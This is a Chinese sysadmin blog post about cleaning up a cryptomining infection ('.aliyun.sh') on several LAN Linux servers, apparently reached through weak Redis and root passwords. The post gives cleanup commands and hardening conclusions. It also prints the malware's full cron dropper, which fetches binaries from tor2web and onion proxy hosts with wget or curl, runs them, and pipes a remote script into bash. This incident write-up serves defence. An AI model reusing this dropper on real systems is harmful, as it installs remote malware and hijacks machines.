zl程序教程

您现在的位置是:首页 >  系统

当前栏目

局域网Linux机器中病毒简单处理 .aliyun.sh 挖矿病毒 ---不彻底

Linux机器 处理 简单 --- 彻底 病毒 局域网
2023-09-27 14:24:15 时间

1. 昨天晚上同事打电话给我说自己的服务器上面的redis无故被清空了,并且查看aof 日志有很多 wget和write指令

一想就是大事不好.局域网中病毒了..

2. 今天早上到公司忙完一阵简单看了下,就发现了五台机器中病毒. (悲伤无以言表)

3. 现象: CPU暴高, 通过虚拟化控制台就能看到

 

 4. 进入虚拟机简单查看一下. 使用top 就能看到

 

 5. 最简单的查看流程. 先看计划任务

crontab -e

 

 

病毒的脚本文件为:

exec &>/dev/null
export PATH=$PATH:/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin
t=trumps4c4ohxvq7o
dir=$(grep x:$(id -u): /etc/passwd|cut -d: -f6)
for i in /usr/bin $dir /dev/shm /tmp /var/tmp;do touch $i/i && cd $i && rm -f i && break;done
x() {
f=/int
d=./$(date|md5sum|cut -f1 -d-)
wget -t1 -T10 -qU- --no-check-certificate $1$f -O$d || curl -m10 -fsSLkA- $1$f -o$d
chmod +x $d;$d;rm -f $d
}
u() {
x=/crn
wget -t1 -T10 -qU- -O- --no-check-certificate $1$x || curl -m10 -fsSLkA- $1$x
}
for h in tor2web.io 4tor.ml onion.mn onion.in.net onion.to d2web.org civiclink.network onion.ws onion.nz onion.glass tor2web.su
do
if ! ls /proc/$(cat /tmp/.X11-unix/00)/io; then
x trumps4c4ohxvq7o.$h
else
break
fi
done

if ! ls /proc/$(cat /tmp/.X11-unix/00)/io; then
(
u $t.tor2web.io ||
u $t.4tor.ml ||
u $t.d2web.org ||
u $t.onion.mn ||
u $t.onion.in.net ||
u $t.onion.to ||
u $t.civiclink.network ||
u $t.onion.pet ||
u $t.tor2web.su ||
u $t.onion.glass ||
u $t.onion.ws
)|bash
fi

 

 

中病毒无疑

删了这条记录,并且将刚才的哪个进程杀掉.

6.删除root目录下的文件

rm -rf /root/.aliyun.sh

7. /usr/bin 目录下还有别的东西 暂时没时间看...

8. 暂时关闭cron的服务避免再次被安装 (周六中午发现没卵用,)

systemctl disable crond && systemctl stop crond

9. 创建一个.aliyun.sh的文件并且增加上不可修改的权限等 

touch /root/.aliyun.sh
chmod 0000  /root/.aliyun.sh
chattr +i  /root/.aliyun.sh
mv /usr/bin/chattr /usr/bin/fuckchattr

 

10. 初步结论

1. redis 0.0.0.0 弱密码必须要修改
2.root账户的弱密码口令必须处理 也有没开redis端口有感染的情况.
3. ssh 互信的机器要关注一下. 

  

 11. 12.8 凌晨继续补充

病毒很变态 发现还有一个驻留进程不占CPU ,所以不能仅通过htop来查看进程还要通过pstree来去查找病毒进程

如图示。

        ├─packagekitd───2*[{packagekitd}]
        ├─pcscd───2*[{pcscd}]
        ├─polkitd───6*[{polkitd}]
        ├─postmaster───7*[postmaster]
        ├─pulseaudio───{pulseaudio}
        ├─rngd
        ├─rpcbind
        ├─rsyslogd───2*[{rsyslogd}]
        ├─rtkit-daemon───2*[{rtkit-daemon}]
        ├─smartd
        ├─sqlservr─┬─sqlservr───152*[{sqlservr}]
        │          └─{sqlservr}
        ├─sshd───sshd───bash───pstree
        ├─systemd-journal
        ├─systemd-logind
        ├─systemd-udevd
        ├─tnslsnr───{tnslsnr}
        ├─tuned───4*[{tuned}]
        ├─udisksd───4*[{udisksd}]
        ├─upowerd───2*[{upowerd}]
        ├─vmtoolsd
        ├─wpa_supplicant
        ├─xdg-permission-───2*[{xdg-permission-}]
        └─y0qYwK

简单分析一下这个进程。发现 的确会出发新的任务来挖矿,只能先简单的干掉这个进程。再看看有没有进程出现。 

二进制文件 直接被删除掉了很难搞。 

索性将/usr/bin 目录设置只读属性不允许写入再进行尝试。 

 

/opt 目录下面也有aliyun.sh

刚才反查了下域名 四月份到六月份注册的。 应该是新变种病毒。 

 12. 继续补充

发现病毒目录采取了 在/tmp 目录下面的文件

使用lsof简单查询一下到底用到了进程然后杀之

文件路径为:

/tmp/.X11-unix

 

[root@CentOS77 .X11-unix]# lsof 00
COMMAND   PID USER   FD   TYPE DEVICE SIZE/OFF     NODE NAME
EyLyU3  30935 root    0w   REG  253,0        6 74418570 00
[root@CentOS77 .X11-unix]# ll /proc/30935/
total 0

 顺便干掉这个目录继续观察

rm -rf /tmp/.X11-unix/